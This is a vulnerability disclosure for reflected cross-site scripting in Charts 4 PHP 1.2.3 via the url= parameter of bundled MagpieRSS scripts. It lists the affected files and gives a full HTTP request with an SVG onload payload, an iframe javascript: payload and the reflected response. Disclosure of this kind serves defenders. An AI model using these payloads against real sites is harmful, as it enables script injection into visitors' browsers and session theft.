Charts 4 PHP version 1.2.3 suffers from a cross site scripting vulnerability.
9f52771a595d4f701fedd8c6ec11273b06d58e6e9c1035201c77176077d21fdd
# Exploit Title: Charts 4 PHP 1.2.3 Cross Site Scripting
# Date: 2016/2/7
# Researcher: 1N3 @CrowdShield - https://crowdshield.com
# Vendor Homepage: http://www.chartphp.com
# Software Link: http://www.chartphp.com
# Version: 1.2.3
# CVE : N/A
+- --=[Description:
Charts 4 PHP version 1.2.3 is vulnerable to multiple reflected cross-site scripting vulnerabilities due to a failure to sanitize user input in several default pages via the url= parameter.
+- --=[Affected Params:
url=
+- --=[Bug Evidence:
VULNERABLE CODE:
Userinput is passed through function parameters.
9: ⇑ $rss = fetch_rss ($url);
6: $url = $_GET['url'];
requires:
8: if($url)
Vulnerability is also triggered in:
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_debug.php
/crowdshield/charts4php/bootstrap/rss/scripts/simple_smarty.php
/crowdshield/charts4php/bootstrap/rss/scripts/magpie_slashbox.php
/crowdshield/charts4php/bootstrap/rss/rss_fetch.inc
/crowdshield/charts4php/bootstrap/rss/rss_parse.inc
HTTP REQUEST:
GET /charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+ HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://crowdshield.com/charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%3Ciframe+src%3D%22+javascript%3Aalert%28%27https%3A%2F%2Fcrowdshield.com%27%29%3B%22%3E%3C%2Fiframe%3E+
Cookie: __cfduid=d89da9abfef7f775eadafcdc1008eac6b1454814806; __utma=242435792.1300894982.1454814681.1454885335.1454891081.5; __utmz=242435792.1454814681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1300894982.1454814681; __atuvc=1%7C5%2C5%7C6; PHPSESSID=qlct9igheoh2ofg7bo8g8ss691; __utmb=242435792.31.10.1454891081; __utmc=242435792; __atuvs=56b7e04adb06138a001
Connection: close
Channel: <p><ul></ul>
<form>
RSS URL: <input type="text" size="30" name="url" value=""><svg/onload=alert(1)>'"-- "><br />
<input type="submit" value="Parse RSS">
</form>